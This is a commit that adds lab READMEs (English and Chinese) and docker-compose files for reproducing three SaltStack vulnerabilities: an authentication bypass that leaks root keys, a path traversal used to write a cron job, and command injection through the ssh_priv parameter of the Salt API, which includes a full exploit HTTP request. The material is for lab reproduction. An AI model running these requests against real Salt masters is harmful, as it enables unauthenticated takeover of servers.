first commit

saltstack/CVE-2020-11651/README.md

@@ -0,0 +1,43 @@
+# SaltStack Information Disclosure Leads to Privilege Escalation (CVE-2020-11651)
+
+[中文版本(Chinese version)](README.zh-cn.md)
+
+SaltStack is a Python-based client-server configuration management tool. A security team disclosed that SaltStack has an authentication bypass vulnerability (CVE-2020-11651) and a directory traversal vulnerability (CVE-2020-11652).
+
+In the CVE-2020-11651, attackers can bypass the Salt Master's validation logic by constructing malicious requests, call unauthorized function features, and consequently achieve remote command execution.
+
+References:
+
+- https://labs.f-secure.com/advisories/saltstack-authorization-bypass
+- https://github.com/rossengeorgiev/salt-security-backports
+- https://github.com/saltstack/salt/blob/a67d76b15615983d467ed81371b38b4a17e4f3b7/tests/integration/master/test_clear_funcs.py
+
+## Environment Setup
+
+Execute the following command to start a SaltStack Master service 2019.2.3:
+
+```
+docker compose up -d
+```
+
+After the server starts, the following ports will be listening:
+
+- 4505/4506: These are the ports for communication between SaltStack Master and minions
+- 8000: This is the Salt API port
+- 2222: This is the SSH server port inside the container
+
+## Vulnerability Reproduction
+
+This document demonstrates the reproduction of CVE-2020-11651 vulnerability.
+
+We can use the following request to execute the `ClearFuncs._prep_auth_info()` method in `salt/master.py`:
+
+```
+{'cmd': '_prep_auth_info'}
+```
+
+Using this method, we can obtain the keys of all users on the target. With these keys, we can execute backend functions with super administrator privileges, such as dispatching tasks.
+
+Using [this POC](https://github.com/dozernz/cve-2020-11651), first obtain the Key, then execute `touch /tmp/success` on the master:
+
+![](1.png)

saltstack/CVE-2020-11651/README.zh-cn.md

@@ -0,0 +1,41 @@
+# SaltStack 信息泄露导致权限提升漏洞（CVE-2020-11651）
+
+SaltStack 是基于 Python 开发的一套C/S架构配置管理工具。国外某安全团队披露了 SaltStack 存在认证绕过漏洞（CVE-2020-11651）和目录遍历漏洞（CVE-2020-11652）。
+
+在 CVE-2020-11651 认证绕过漏洞中，攻击者通过构造恶意请求，可以绕过 Salt Master 的验证逻辑，调用相关未授权函数功能，从而可以造成远程命令执行漏洞。
+
+参考链接：
+
+- https://labs.f-secure.com/advisories/saltstack-authorization-bypass
+- https://github.com/rossengeorgiev/salt-security-backports
+- https://github.com/saltstack/salt/blob/a67d76b15615983d467ed81371b38b4a17e4f3b7/tests/integration/master/test_clear_funcs.py
+
+## 漏洞环境
+
+执行如下命令启动一个SaltStack Master服务：
+
+```
+docker compose up -d
+```
+
+环境启动后，将会在本地监听如下端口：
+
+- 4505/4506 这是SaltStack Master与minions通信的端口
+- 8000 这是Salt的API端口
+- 2222 这是容器内部的SSH服务器监听的端口
+
+## 漏洞复现
+
+本文档复现CVE-2020-11651漏洞。
+
+我们可以使用如下请求来执行`salt/master.py`中的`ClearFuncs._prep_auth_info()`方法：
+
+```
+{'cmd': '_prep_auth_info'}
+```
+
+利用这个方法，可以获得目标的所有用户的key，利用这个key即可通过超级管理员权限执行一些后台功能，比如下发任务等。
+
+使用[这个POC](https://github.com/dozernz/cve-2020-11651)，首先获取Key，再在master中执行`touch /tmp/success`：
+
+![](1.png)

saltstack/CVE-2020-11651/docker-compose.yml

@@ -0,0 +1,8 @@
+services:
+ saltstack:
+   image: vulhub/saltstack:2019.2.3
+   ports:
+    - "8000:8000"
+    - "4505:4505"
+    - "4506:4506"
+    - "2222:22"

saltstack/CVE-2020-11652/README.md

@@ -0,0 +1,57 @@
+# SaltStack Arbitrary File Read and Write (CVE-2020-11652)
+
+[中文版本(Chinese version)](README.zh-cn.md)
+
+SaltStack is a Python-based client-server configuration management tool. A security team disclosed that SaltStack has an authentication bypass vulnerability (CVE-2020-11651) and a directory traversal vulnerability (CVE-2020-11652).
+
+In the CVE-2020-11652, attackers can read and write arbitrary files on the server by constructing malicious requests.
+
+References:
+
+- https://labs.f-secure.com/advisories/saltstack-authorization-bypass
+- [https://github.com/rossengeorgiev/salt-security-backports][1]
+- [https://github.com/jasperla/CVE-2020-11651-poc][2]
+
+## Environment Setup
+
+Execute the following command to start a SaltStack Master service 2019.2.3:
+
+```
+docker compose up -d
+```
+
+After the environment starts, the following ports will be listening:
+
+- 4505/4506: These are the ports for communication between SaltStack Master and minions
+- 8000: This is the Salt API port
+- 2222: This is the SSH server port inside the container
+
+## Vulnerability Reproduction
+
+This document demonstrates the CVE-2020-11652 vulnerability, referring to the vulnerability author's explanation:
+
+> The wheel module contains commands used to read and write files under specific directory paths. The inputs to these functions are concatenated with the target directory and the resulting path is not canonicalized, leading to an escape of the intended path restriction.
+
+The write method in wheel/file_roots.py uses `os.path.isabs` to check if the user input is an absolute path, possibly to prevent writing to other directories. However, attackers can actually use `../` to traverse to the root directory and write arbitrary files:
+
+```
+msg = {
+    'key': root_key,
+    'cmd': 'wheel',
+    'fun': 'file_roots.write',
+    'path': '../../path/to/target',
+    'data': 'test'
+#    'saltenv': 'base',
+  }
+```
+
+Referring to [this project][1], we can write a simple POC to write to `/etc/cron.d/shell` and use crontab to execute arbitrary commands:
+
+![](1.png)
+
+`id > /tmp/success` was successfully executed.
+
+You can also use this [POC][2] to reproduce the vulnerability.
+
+[1]: https://github.com/rossengeorgiev/salt-security-backports
+[2]: https://github.com/jasperla/CVE-2020-11651-poc

saltstack/CVE-2020-11652/README.zh-cn.md

@@ -0,0 +1,55 @@
+# SaltStack 任意文件读写漏洞（CVE-2020-11652）
+
+SaltStack 是基于 Python 开发的一套C/S架构配置管理工具。国外某安全团队披露了 SaltStack 存在认证绕过漏洞（CVE-2020-11651）和目录遍历漏洞（CVE-2020-11652）。
+
+在 CVE-2020-11652 目录遍历漏洞中，攻击者通过构造恶意请求，可以读取、写入服务器上任意文件。
+
+参考链接：
+
+- https://labs.f-secure.com/advisories/saltstack-authorization-bypass
+- [https://github.com/rossengeorgiev/salt-security-backports][1]
+- [https://github.com/jasperla/CVE-2020-11651-poc][2]
+
+## 漏洞环境
+
+执行如下命令启动一个SaltStack Master服务：
+
+```
+docker compose up -d
+```
+
+环境启动后，将会在本地监听如下端口：
+
+- 4505/4506 这是SaltStack Master与minions通信的端口
+- 8000 这是Salt的API端口
+- 2222 这是容器内部的SSH服务器监听的端口
+
+## 漏洞复现
+
+本文档复现CVE-2020-11652漏洞，参考漏洞作者的说明：
+
+> The wheel module contains commands used to read and write files under specific directory paths. The inputs to these functions are concatenated with the target directory and the resulting path is not canonicalized, leading to an escape of the intended path restriction.
+
+wheel/file_roots.py文件中的write方法，使用`os.path.isabs`来判断用户输入是否是绝对路径，可能目的是防止写入其他目录，但实际上攻击者可以通过`../`的方式跳转至根目录，进而写入任意文件：
+
+```
+msg = {
+    'key': root_key,
+    'cmd': 'wheel',
+    'fun': 'file_roots.write',
+    'path': '../../path/to/target',
+    'data': 'test'
+#    'saltenv': 'base',
+  }
+```
+
+参考[这个项目][1]，编写一个简单的POC，写入`/etc/cron.d/shell`，利用crontab执行任意命令：
+
+![](1.png)
+
+`id > /tmp/success`成功被执行。
+
+也可以通过这个[POC][2]来复现该漏洞。
+
+[1]: https://github.com/rossengeorgiev/salt-security-backports
+[2]: https://github.com/jasperla/CVE-2020-11651-poc

saltstack/CVE-2020-11652/docker-compose.yml

@@ -0,0 +1,8 @@
+services:
+ saltstack:
+   image: vulhub/saltstack:2019.2.3
+   ports:
+    - "8000:8000"
+    - "4505:4505"
+    - "4506:4506"
+    - "2222:22"

saltstack/CVE-2020-16846/README.md

@@ -0,0 +1,50 @@
+# SaltStack Command Injection Remote Code Execution (CVE-2020-16846)
+
+[中文版本(Chinese version)](README.zh-cn.md)
+
+Salt is a new approach to infrastructure management built on a dynamic communication bus. Salt can be used for data-driven orchestration, remote execution for any infrastructure, configuration management for any app stack, and much more.
+
+In November 2020, SaltStack officially disclosed two vulnerabilities, CVE-2020-16846 and CVE-2020-25592. CVE-2020-25592 allows arbitrary user to use the SSH module, and CVE-2020-16846 allows users to execute arbitrary commands. Chain these two vulnerabilities will allow unauthorized attackers to execute arbitrary commands through the Salt API.
+
+References:
+
+- https://mp.weixin.qq.com/s/R8qw_lWizGyeJS0jOcYXag
+- https://docs.saltstack.com/en/latest/ref/netapi/all/salt.netapi.rest_cherrypy.html
+
+## Vulnerable Environment
+
+Execute the following command to start a SaltStack-Master service:
+
+```
+docker compose up -d
+```
+
+After the SaltStack-Master is started, the following ports will be listened:
+
+- 4505/4506: SaltStack-Master server, which is a bridge between master and minions
+- 8000: Salt's API server, **SSL requiring**
+- 2222: SSH server inside the container
+
+## Exploit
+
+Send the following request to `https://your-ip:8000/run`:
+
+```
+POST /run HTTP/1.1
+Host: 127.0.0.1:8000
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:68.0) Gecko/20100101 Firefox/68.0
+Accept: application/x-yaml
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+DNT: 1
+Connection: close
+Upgrade-Insecure-Requests: 1
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 87
+
+token=12312&client=ssh&tgt=*&fun=a&roster=whip1ash&ssh_priv=aaa|touch%20/tmp/success%3b
+```
+
+Inject the command `touch /tmp/success` through the `ssh_priv` parameter:
+
+![](1.png)

saltstack/CVE-2020-16846/README.zh-cn.md

@@ -0,0 +1,45 @@
+# SaltStack 命令注入漏洞（CVE-2020-16846）
+
+SaltStack 是基于 Python 开发的一套C/S架构配置管理工具。2020年11月SaltStack官方披露了CVE-2020-16846和CVE-2020-25592两个漏洞，其中CVE-2020-25592允许任意用户调用SSH模块，CVE-2020-16846允许用户执行任意命令。组合这两个漏洞，将可以使未授权的攻击者通过Salt API执行任意命令。
+
+参考链接：
+
+- https://mp.weixin.qq.com/s/R8qw_lWizGyeJS0jOcYXag
+
+## 漏洞环境
+
+执行如下命令启动一个SaltStack Master服务：
+
+```
+docker compose up -d
+```
+
+环境启动后，将会在本地监听如下端口：
+
+- 4505/4506 这是SaltStack Master与minions通信的端口
+- 8000 这是Salt的API端口，**需要通过https访问**
+- 2222 这是容器内部的SSH服务器监听的端口
+
+## 漏洞复现
+
+向`https://your-ip:8000/run`发送如下数据包：
+
+```
+POST /run HTTP/1.1
+Host: 127.0.0.1:8000
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:68.0) Gecko/20100101 Firefox/68.0
+Accept: application/x-yaml
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+DNT: 1
+Connection: close
+Upgrade-Insecure-Requests: 1
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 87
+
+token=12312&client=ssh&tgt=*&fun=a&roster=whip1ash&ssh_priv=aaa|touch%20/tmp/success%3b
+```
+
+通过`ssh_priv`位置注入命令`touch /tmp/success`，进入容器可见已执行成功：
+
+![](1.png)

saltstack/CVE-2020-16846/docker-compose.yml

@@ -0,0 +1,8 @@
+services:
+ saltstack:
+   image: vulhub/saltstack:3002
+   ports:
+    - "8000:8000"
+    - "4505:4505"
+    - "4506:4506"
+    - "2222:22"